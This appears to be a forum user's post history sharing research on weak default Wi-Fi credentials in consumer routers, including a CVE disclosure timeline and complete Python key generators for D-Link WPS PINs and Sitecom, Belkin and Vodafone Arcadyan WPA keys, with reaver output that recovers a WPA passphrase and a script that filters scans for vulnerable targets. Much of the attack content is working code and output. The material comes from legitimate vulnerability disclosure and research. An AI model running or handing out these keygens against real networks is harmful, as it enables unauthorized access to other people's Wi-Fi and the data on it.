Show Messages

This section lets you see all messages written by this user. Note that you can only see messages written in areas you currently have access to.


Topics - *dudux

#1
I have just released the Pirelli Arnet algorithm; I hope the company fixes the problems this causes.

CVE-2015-0558: Reverse-engineering the default WPA key generation algorithm for Pirelli routers in Argentina
http://ednolo.alumnos.upv.es/?p=1883


Timeline:
2014-09-11  Found the algorithm
2014-09-12  Sent a message to @ArnetOnline via Twitter from @enovella_
2014-09-15  Sent a message via the website, still looking for a plain e-mail address (http://www.telecom.com.ar/hogares/contacto_tecnico.html)
2014-09-16  Sent another message to Arnet via the website. First reply via Twitter, where they redirect me to the website form.
2014-09-19  Direct message via Twitter. I tell them about the critical vulnerability and offer them an e-mail address with a PGP key
2014-09-20  More Twitter DMs about the same. They do not want to be made aware of the problem, though.
2014-09-23  Given its little interest, I assume that Arnet does not care about its clients' security at all.
2014-09-24  I send the problem to the vendor ADB Pirelli via the website form
2014-09-28  I send the problem to the vendor ADB Pirelli via e-mail to Switzerland
2015-01-05  Full disclosure
#2
Original link:
http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/


Proof of concept:
#!/usr/bin/env python
#
# Calculates the default WPS pin from the BSSID/MAC of many D-Link routers/APs.
#
# Craig Heffner
# Tactical Network Solutions

class WPSException(Exception):
    pass

class WPS(object):

    def checksum(self, pin):
        '''
        Standard WPS checksum algorithm.

        @pin - A 7 digit pin to calculate the checksum for.

        Returns the checksum value.
        '''
        accum = 0

        # Walk the pin from the right: odd positions weigh 3, even ones 1
        while pin:
            accum += (3 * (pin % 10))
            pin //= 10
            accum += (pin % 10)
            pin //= 10

        return ((10 - accum % 10) % 10)

class DLink(object):

    def __init__(self):
        self.wps = WPS()

    def __mac2nic(self, mac):
        '''
        Parses out the NIC portion of an ASCII MAC address.

        @mac - An ASCII string MAC address or NIC,
               with or without delimiters.

        Returns the NIC portion of the MAC address as an int.
        '''
        mac = mac.replace(':', '').replace('-', '')

        if len(mac) == 12:
            try:
                nic = int(mac[6:], 16)
            except ValueError:
                raise WPSException("Invalid NIC: [%s]" % mac[6:])
        elif len(mac) == 6:
            try:
                nic = int(mac, 16)
            except ValueError:
                raise WPSException("Invalid NIC: [%s]" % mac)
        else:
            raise WPSException("Invalid MAC address: [%s]" % mac)

        return nic

    def generate(self, mac):
        '''
        Calculates the default WPS pin from the NIC portion of the MAC address.

        @mac - The MAC address string.

        Returns the calculated default WPS pin, including checksum.
        '''
        nic = self.__mac2nic(mac)

        # Do some XOR operations on the NIC
        pin = nic ^ 0x55AA55
        pin = pin ^ (((pin & 0x0F) << 4) +
                     ((pin & 0x0F) << 8) +
                     ((pin & 0x0F) << 12) +
                     ((pin & 0x0F) << 16) +
                     ((pin & 0x0F) << 20))

        # The largest possible remainder for any value divided by 10,000,000
        # is 9,999,999 (7 digits). The smallest possible remainder is, obviously, 0.
        pin = pin % 10000000

        # If the pin is less than 1,000,000 (i.e., less than 7 digits)
        if pin < 1000000:
            # The largest possible remainder for any value divided by 9 is
            # 8; hence this adds at most 9,000,000 to the pin value, and at
            # least 1,000,000. This guarantees that the pin will be 7 digits
            # long, and also means that it won't start with a 0.
            pin += ((pin % 9) * 1000000) + 1000000

        # The final 8 digit pin is the 7 digit value just computed, plus a
        # checksum digit.
        return (pin * 10) + self.wps.checksum(pin)

if __name__ == '__main__':
    import sys

    try:
        mac = sys.argv[1]
    except IndexError:
        print("Usage: %s <mac>" % sys.argv[0])
        sys.exit(1)

    try:
        print("Default pin: %d" % DLink().generate(mac))
    except WPSException as e:
        print(str(e))
        sys.exit(1)





Usage example:

$ sudo airodump-ng mon0 -c 4

CH  4 ][ Elapsed: 0 s ][ 2014-09-11 11:44 ][ fixed channel mon0: -1
                                                                     
BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
                                                                   
C0:A0:BB:EF:B3:D6  -13   0        6        0    0   4  54e  WPA2 CCMP   PSK  dlink-B3D6

$ ./pingen C0:A0:BB:EF:B3:D7   # <--- WAN MAC is BSSID+1
Default Pin: 99767389

$ sudo reaver -i mon0 -b C0:A0:BB:EF:B3:D6 -c 4 -p 99767389

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from C0:A0:BB:EF:B3:D6
[+] Associated with C0:A0:BB:EF:B3:D6 (ESSID: dlink-B3D6)
[+] WPS PIN: '99767389'
[+] WPA PSK: 'hluig79268'
[+] AP SSID: 'dlink-B3D6'


Affected routers:
Confirmed Affected:

   DIR-810L
   DIR-826L
   DIR-632
   DHP-1320
   DIR-835
   DIR-615 revs: B2, C1, E1, E3
   DIR-657
   DIR-827
   DIR-857
   DIR-451
   DIR-655 revs: A3, A4, B1
   DIR-825 revs: A1, B1
   DIR-651
   DIR-855
   DIR-628
   DGL-4500
   DIR-601 revs: A1, B1
   DIR-836L
   DIR-808L
   DIR-636L
   DAP-1350
   DAP-1555

Confirmed Unaffected:

   DIR-815
   DIR-505L
   DIR-300
   DIR-850L
   DIR-412
   DIR-600
   DIR-685
   DIR-817LW
   DIR-818LW
   DIR-803
   DIR-845L
   DIR-816L
   DIR-860L
   DIR-645
   DIR-685
   DAP-1522


#3
Sitecom firmware encryption and wireless keys
http://blog.emaze.net/2014/04/sitecom-firmware-and-wifi.html

Covered in the post: reversing, the algorithm, and the firmware encryption (XOR) with its key leakage.


Authors: Roberto Paleari (@rpaleari) and Alessandro Di Pinto (@adipinto)

Proof-of-concept:
https://drive.google.com/file/d/0BzcoLOYkGWG6WFNhZGV6V2lKcW8/edit


#
# Default WPA key generator for Sitecom WLR-4000/4004 routers
# ===========================================================
#
# Authors:
#   Roberto Paleari     (@rpaleari)
#   Alessandro Di Pinto (@adipinto)
#
# Advisory URL:
#   http://blog.emaze.net/2014/04/sitecom-firmware-and-wifi.html
#
# (Runs under Python 3: bytes.fromhex()/int.from_bytes() replace the
# str.decode("hex")/encode("hex") calls of the original Python 2 script.)

import argparse
import logging

# Charsets used for the generation of WPA key by different Sitecom models
CHARSETS = {
    "4000": (
        "23456789ABCDEFGHJKLMNPQRSTUVWXYZ38BZ",
        "WXCDYNJU8VZABKL46PQ7RS9T2E5H3MFGPWR2"
    ),

    "4004": (
        "JKLMNPQRST23456789ABCDEFGHUVWXYZ38BK",
        "E5MFJUWXCDKL46PQHAB3YNJ8VZ7RS9TR2GPW"
    ),
}

def generateKey(mac, model, keylength=12):
    assert model in CHARSETS

    charset1, charset2 = CHARSETS[model]
    assert len(charset1) == len(charset2)

    mac = bytes.fromhex(mac.replace(":", ""))
    assert len(mac) == 6

    # The generator is seeded with the last four bytes of the MAC (32 bits)
    val = int.from_bytes(mac[2:6], "big")

    magic1 = 0x98124557
    magic2 = 0x0004321a
    magic3 = 0x80000000

    # LFSR-like stepping: one charset offset per output character
    offsets = []
    for i in range(keylength):
        if (val & 0x1) == 0:
            val = val ^ magic2
            val = val >> 1
        else:
            val = val ^ magic1
            val = val >> 1
            val = val | magic3

        offset = val % len(charset1)
        offsets.append(offset)

    wpakey = ""
    wpakey += charset1[offsets[0]]

    # Each following character is taken from charset1, unless the offset
    # repeats the previous one, in which case charset2 is used instead
    for i in range(0, keylength-1):
        magic3 = offsets[i]
        magic1 = offsets[i+1]

        if magic3 != magic1:
            magic3 = charset1[magic1]
        else:
            magic3 = (magic3 + i) % len(charset1)
            magic3 = charset2[magic3]
        wpakey += magic3

    return wpakey


def main():
    # Parse command-line arguments
    parser = argparse.ArgumentParser(formatter_class=
                                     argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument("-m", "--model", choices=sorted(CHARSETS),
                        required=True, help="device model")
    parser.add_argument('mac', help="MAC address")
    args = parser.parse_args()

    # Configure logging
    logging.basicConfig(format='[%(asctime)s] %(levelname)s : %(message)s',
                        level=logging.DEBUG)

    # Generate SSID and WPA key: the default SSID is "Sitecom" followed by
    # the last three bytes of the MAC
    ssid = "Sitecom%s" % args.mac.replace(":", "")[6:].upper()
    wpa = generateKey(args.mac, args.model)

    print("MAC:  %s" % args.mac)
    print("SSID: %s" % ssid)
    print("WPA:  %s" % wpa)


if __name__ == "__main__":
    main()




#4
After reading this PDF, I ported it to Python, so it doesn't hurt to share it.


Sorry for not giving more detail, but I have no more time. Read the references in the code.

Repository:
https://bitbucket.org/dudux/belkin4xx

Download:

$ git clone https://dudux@bitbucket.org/dudux/belkin4xx.git


Usage:
$ python belkin4xx.py -h
usage: belkin4xx.py [-h] [-b [BSSID]] [-e [ESSID]] [-v] [-w [WORDLIST]]
                [-a | -l]

>>> Keygen for WiFi routers manufactured by Belkin. So far only WiFi networks
with essid like Belkin.XXXX, Belkin_XXXXXX, belkin.xxx and belkin.xxxx are
likely vulnerable, although routers using those macaddresses could be
vulnerable as well. Twitter: @enovella_ and email: ednolo[at]inf.upv.es

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -w [WORDLIST], --wordlist [WORDLIST]
                    Filename to store keys
  -a, --allkeys         Create all possible cases. Definitely recommended if
                    first attempt fails
  -l, --list            List all vulnerable mac address so far

required:
  -b [BSSID], --bssid [BSSID]
                    Target bssid
  -e [ESSID], --essid [ESSID]
                    Target essid. [BelkinXXXX,belkin.XXXX]

(+) Help: python belkin4xx.py -b 94:44:52:00:C0:DE -e Belkin.c0de


$ python belkin4xx.py -l
  • Possible vulnerable targets so far:

         essid: Belkin.XXXX
         essid: Belkin_XXXXXX
         essid: belkin.xxxx
         essid: belkin.xxx

         bssid: 94:44:52:uv:wx:yz
         bssid: 08:86:3B:uv:wx:yz
         bssid: EC:1A:59:uv:wx:yz

    $ python belkin4xx.py -b 94:44:52:00:C0:DE -e Belkin.c0de
  • Your WPA key might be :
    040D93B0

    $ python belkin4xx.py -b 94:44:52:00:ce:d0 -e belkin.ed0
  • Your WPA key might be :
    d49496b9

    $ python belkin4xx.py -b 94:44:52:00:ce:d0 -a
  • Your WPA keys might be :
    64949db9
    D40493B0
    649996b9
    649496b9
    d49496b9
    34029DB0
    d49996b9
    D40293B0
    64999db9
    340493B0
    34009DB0
    340093B0
    34049DB0
    340293B0
    D40093B0


    $ python belkin4xx.py -b 94:44:52:00:ce:d0 -a -w keys.txt
    $ cat keys.txt
    64949db9
    D40493B0
    649996b9
    649496b9
    d49496b9
    34029DB0
    d49996b9
    D40293B0
    64999db9
    340493B0
    34009DB0
    340093B0
    34049DB0
    340293B0
    D40093B0
#5

git clone https://bitbucket.org/dudux/vodafonearcadyanspain.git


More details at:
http://ednolo.alumnos.upv.es/?p=1760



Background
Around 2011 some routers manufactured by the company Arcadyan were reverse engineered by the staff of seguridadwireless.net. That research came from a user called MrFoffly or something like that. He obtained an interesting log from a Ya.com update: he took a firmware image and applied XOR FF in raw mode, obtaining the following logs. Many routers could be affected by the same vulnerability in the future if this company keeps using the same public and patented algorithms.

##!![E-BOOTPARAM-WRITE] User settings are not stored!!
###[BUILD-WEP] (Z1 Z2 Z3): %1X%1X%1X
##[BUILD-WEP] (x[1] XOR z[2])=(%1X XOR %1X)=%1X
##[BUILD-WEP] (y[2] XOR y[3]) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (x[3]  XOR y[1]) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (x[2]  XOR z[3]) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (w[0] w[1] w[2] w[3]): %1X%1X%1X%1X
####%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X%1X#[BUILD-WEP]: Key:%s
####[BUILD-WEP] K1,2:[%1X,%1X]
#[BUILD-WEP] (K1 XOR S10)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K1 XOR S9) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (K1 XOR S8) =(%1X XOR %1X)=%1X
#[BUILD-WEP] (X1 X2 X3): %1X%1X%1X
##[BUILD-WEP] (K2 XOR M10)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K2 XOR M11)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (K2 XOR M12)=(%1X XOR %1X)=%1X
#[BUILD-WEP] (Y1 Y2 Y3): %1X%1X%1X
##[BUILD-WEP] (M11 XOR S10)=(%1X XOR %1X)=%1X
####Boot Parameters NOT found !!!
##Bootcode version: %s
###Serial number: %s
##Hardware version: %s
###%02X%02X%02X%02X%02X%02X####strWlanMacAddr:%s
##WLAN%c%c%c%c%c%c####[BUILD-WEP] S6,7,8,9,10:[%1X,%1X,%1X,%1X,%1X]
##[BUILD-WEP] M7,8,9,10,11,12:[%1X,%1X,%1X,%1X,%1X,%1X]
##!!! Invalid wireless channel range %d ~ %d
#!!! Use default value %d ~ %d
##default route: %d.%d.%d.%d
#ifno:%d  enableOS:%d enableWEP:%d enableSSN:%d
#!!No configuration file present!!
##!!Cleanup configuration in flash memory!!
##%s> flash version:[%s], [%d.%d.%d]
#etcpip_init_config##Jan 18 2008#16:39:45####Set flash memory layout to #BRN-BOOT####Boot Parameters found !!!
##01234567####[BUILD-WEP] (M12 XOR S9) =(%1X XOR %1X)=%1X
####[BUILD-WEP] (K1  XOR K2) =(%1X XOR %1X)=%1X
####!![E-CFG-VER] Reconfiguration required!!


After that, some of us were a bit stuck, but another user, Mambostar, managed to figure out the algorithm in order to generate 10 possible keys by using the logs as well as the patents [see references]. Two years later, some German researchers reverse engineered some Easybox routers and found the same problems. Whether using this algorithm or the patents as well, many routers were exposed all over Germany. About one year later, around 2013-2014, and unfortunately, this algorithm has come back to hit some Spanish routers deployed by Vodafone, specifically the model ARV752DPW. However, really not many of Vodafone's routers have been affected by this vulnerability.

Proof-of-concept
Here is a proof of concept for this vulnerability, which I coded because of a small difference in the algorithm. Plenty of code has been reused from previous scripts; please take a look at the credits in the code. So far the only difference noticed has been the swapping of zeros for ones at the end of the key generation algorithm, and other very weird stuff like the use of non-hexadecimal characters in the ESSID. If any zero is detected in the fifth or sixth byte of the BSSID, it is automatically transformed into G for the ESSID.

import sys

def algorithm(mac):
    '''Sebastian Petters. Changes: added exceptions and left out some pointless variables'''
    try:
        octets = [int(x, 16) for x in mac.split(':')]
        # S6..S10: the last two bytes of the BSSID as a 5-digit decimal number
        c1 = (octets[-2] << 8) + octets[-1]
        (s6, s7, s8, s9, s10) = [int(x) for x in '%05d' % (c1)]
        # M9..M12: the last four hex digits of the BSSID
        (m9, m10, m11, m12)   = [int(x, 16) for x in mac.replace(':', '')[8:]]
    except (ValueError, IndexError):
        sys.stderr.write("[!] Check your bssid!  Format XX:XX:XX:XX:XX:XX\n")
        sys.exit()

    # K1/K2 and the X/Y/Z nibbles follow the [BUILD-WEP] log messages above
    k1 = ( s7 + s8  + m11 + m12) & (0x0F)
    k2 = ( m9 + m10 + s9  + s10) & (0x0F)
    x1 = k1  ^ s10
    x2 = k1  ^ s9
    x3 = k1  ^ s8
    y1 = k2  ^ m10
    y2 = k2  ^ m11
    y3 = k2  ^ m12
    z1 = m11 ^ s10
    z2 = m12 ^ s9
    z3 = k1  ^ k2

    wpa = "%X%X%X%X%X%X%X%X%X" % (x1, y1, z1, x2, y2, z2, x3, y3, z3)

    # Spanish modification in this algorithm: every 0 becomes a 1
    if wpa.find("0") != -1:
        wpa = wpa.replace("0","1")

    return wpa

Any suggestions or feedback are always much appreciated, as are bug reports or any enhancement.


$ python vodafoneArcadyanSpain.py -h
usage: vodafoneArcadyanSpain.py [-h] [-b [BSSID]] [-v] [-l]

>>> PoC keygen for WiFi Networks deployed by Vodafone Arcadyan in Spain. So
far only WiFi networks with well-known bssids and essid like VodafoneXXXX are
likely vulnerable. See http://ednolo.alumnos.upv.es/ for more details.
Twitter: @enovella_ and email: ednolo[at]inf.upv.es

optional arguments:
 -h, --help            show this help message and exit
 -v, --version         show program's version number and exit
 -l, --list            List all vulnerable mac address (essid VodafoneXXXX)

required:
 -b [BSSID], --bssid [BSSID]
                       Target mac address

(+) Help: Send me bugs or new targets. Credits buckynet as usual

$ python vodafoneArcadyanSpain.py -l
[+] Possible vulnerable targets:
    bssid: 74:31:70:xx:xx:xx    essid: VodafoneXXXX
    bssid: 84:9C:A6:xx:xx:xx    essid: VodafoneXXXX
    bssid: 88:03:55:xx:xx:xx    essid: VodafoneXXXX
    bssid: 1C:C6:3C:xx:xx:xx    essid: VodafoneXXXX
    bssid: 50:7E:5D:xx:xx:xx    essid: VodafoneXXXX
    bssid: 00:12:BF:xx:xx:xx    essid: VodafoneXXXX

$ python vodafoneArcadyanSpain.py -b 74:31:70:33:00:11
[+] SSID       : VodafoneGG11
[+] BSSID      : 74:31:70:33:00:11
[+] WPA KEY    : 58639129A
[+] WPS PIN    : 75944988





What a joy to see *dudux  ;-)

https://foro.elhacker.net/hacking_wireless/cuidado_con_los_que_tengais_un_router_vodafone-t406822.0.html
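
A triage helper for the Vodafone/Arcadyan post above, added here as an example and not part of dudux's vodafonearcadyanspain repository: it reproduces the ESSID rule the post describes (each zero hex digit in the last two bytes of the BSSID is shown as G, so 74:31:70:33:00:11 advertises VodafoneGG11) and filters a scan list down to the networks that match both a listed OUI and the derived default ESSID, which is the post's own "well-known bssids and essid like VodafoneXXXX" heuristic. The OUI list is copied from the -l output above; the per-hex-digit reading of the zero-to-G rule and the sample scan entries (except the first) are assumptions and constructed data, not from the post.

```python
# Added example (not from the post or its repository): ESSID derivation and
# scan triage for the Vodafone/Arcadyan case described above.

# OUIs as listed by `vodafoneArcadyanSpain.py -l` above
VULNERABLE_OUIS = {"74:31:70", "84:9C:A6", "88:03:55",
                   "1C:C6:3C", "50:7E:5D", "00:12:BF"}

HEX = "0123456789ABCDEF"


def normalize_mac(mac):
    """Upper-case, colon-separated form; raises ValueError on malformed input."""
    parts = mac.strip().upper().replace("-", ":").split(":")
    if len(parts) != 6 or any(len(p) != 2 or any(c not in HEX for c in p)
                              for p in parts):
        raise ValueError("bad MAC: %r" % mac)
    return ":".join(parts)


def expected_essid_suffix(bssid):
    """Last two BSSID bytes as four hex digits, with every '0' shown as 'G'.

    Assumption: the post's "zero ... transformed into G" rule is applied per
    hex digit (00:11 -> GG11), so a byte such as 0B would give GB.
    """
    last4 = normalize_mac(bssid).replace(":", "")[8:]
    return last4.replace("0", "G")


def expected_essid(bssid):
    """Default ESSID the post associates with a given BSSID."""
    return "Vodafone" + expected_essid_suffix(bssid)


def likely_vulnerable(bssid, essid):
    """The post's heuristic: a listed OUI *and* the unchanged default ESSID."""
    bssid = normalize_mac(bssid)
    return bssid[:8] in VULNERABLE_OUIS and essid == expected_essid(bssid)


def triage(scan):
    """scan: iterable of (bssid, essid) pairs, e.g. parsed from airodump-ng.

    Returns, in input order, the pairs worth feeding to the keygen.
    """
    return [(b, e) for b, e in scan if likely_vulnerable(b, e)]


# Constructed sample scan; only the first entry is taken from the post.
SAMPLE_SCAN = [
    ("74:31:70:33:00:11", "VodafoneGG11"),
    ("84:9C:A6:12:34:56", "MyHomeWifi"),   # default ESSID changed: outside the heuristic
    ("00:12:BF:AA:0B:C0", "VodafoneGBCG"),
    ("C0:A0:BB:EF:B3:D6", "dlink-B3D6"),   # not an Arcadyan OUI
]

if __name__ == "__main__":
    for bssid, essid in triage(SAMPLE_SCAN):
        print("[+] candidate: %s  %s" % (bssid, essid))
```

The filter deliberately keys on the ESSID as well as the OUI: a network whose owner renamed the ESSID is not flagged, which matches the post's wording but says nothing about whether its key was also changed, so treat a miss as "outside the heuristic" rather than "safe".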
#7
Well, it seems they were selling a small wireless AP for 5 euros... and even if you have a contract with FON you can add a friend and they give them an AP for free... (no joke!)

From what I've seen it has an Atheros chipset, the firmware can be updated, and it supports WDS...

DOES ANYONE HAVE A FONERA???
ANY CHARITABLE SOUL OUT THERE??
WILL SOMEONE ADD ME?????
anonimocrust@yahoo.es

http://blog.fon.com/es/